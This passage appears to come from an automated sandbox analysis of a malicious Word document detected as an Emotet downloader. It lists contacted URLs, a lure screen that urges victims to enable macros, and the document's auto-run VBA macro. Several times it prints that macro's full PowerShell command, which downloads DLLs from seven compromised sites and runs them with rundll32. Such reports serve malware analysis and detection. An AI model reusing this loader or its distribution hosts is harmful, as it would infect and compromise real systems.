    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://cortana.ai
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://cortana.ai/api
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://cr.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://dev.cortana.ai
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://devnull.onenote.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://directory.services.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: powershell.exe, 00000006.00000003.729788789.00000000080F3000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: powershell.exe, 00000006.00000003.728233664.0000000005A8B000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://graph.windows.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://graph.windows.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://lifecycle.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://login.windows.local
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://management.azure.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://management.azure.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://messaging.office.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ncus.contentsync.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://officeapps.live.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://onedrive.live.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://osi.office.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://otelrules.azureedge.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office365.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office365.com/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://roaming.edog.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://settings.outlook.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://staging.cortana.ai
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://tasks.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://wus2.contentsync.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownDNS traffic detected: queries for: primtalent.com
    Source: global trafficHTTP traffic detected: GET /wp-admin/9yt1u/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: primtalent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /wordpress/6f0qIQlWPaYDfa/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: huskysb.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: huskysb.com

    E-Banking Fraud:

    barindex
    Yara detected Emotet DownloaderShow sources
    Source: Yara matchFile source: C:\Users\user\Documents\20211122\PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt, type: DROPPED

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. Page1 of 1 Owords 112 O Typ
    Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
    Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
    Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. Page1 of 1 Owords 112 O Type here to search m %
    Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLEOTENT" buttons to pcenew thiS Document O O O Page1 of 1 Owords It? O T
    Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED # M,,,o,m I Shortcut Tools Use these buttons to quickly customize your obje
    Source: Screenshot number: 8Screenshot OCR: protected documents O You have to press "ENABLE EDITING" and "ENABLEOTENT" buttons to pcenew thiS D
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
    Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
    Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
    Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
    Document contains an embedded VBA with functions possibly related to ADO stream file operationsShow sources
    Source: ~DF0E259767A8C316A9.TMP.0.drStream path 'VBA/cvbku3gakuisdgfilu3gblaw' : found possibly 'ADODB.Stream' functions open, read, write
    Document contains an embedded VBA macro which may execute processesShow sources
    Source: VBA code instrumentationOLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function fjow3efyw98efhasdokfhlnkvawofh3, API Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)Name: fjow3efyw98efhasdokfhlnkvawofh3
    Source: ~DF0E259767A8C316A9.TMP.0.drOLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
    Source: C:\Users\user\AppData\Local\Temp\~DF0E259767A8C316A9.TMP, type: DROPPEDMatched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
    Source: 704.docOLE indicator application name: unknown
    Source: ~DF0E259767A8C316A9.TMP.0.drOLE indicator application name: unknown
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.drOLE indicator application name: unknown
    Source: 704.docOLE, VBA macro line: Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
    Source: VBA code instrumentationOLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function Document_OpenName: Document_Open
    Source: ~DF0E259767A8C316A9.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
    Source: ~DF0E259767A8C316A9.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: 704.docOLE indicator has summary info: false
    Source: ~DF0E259767A8C316A9.TMP.0.drOLE indicator has summary info: false
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.drOLE indicator has summary info: false
    Source: 704.docOLE indicator, VBA macros: true
    Source: ~DF0E259767A8C316A9.TMP.0.drOLE indicator, VBA macros: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
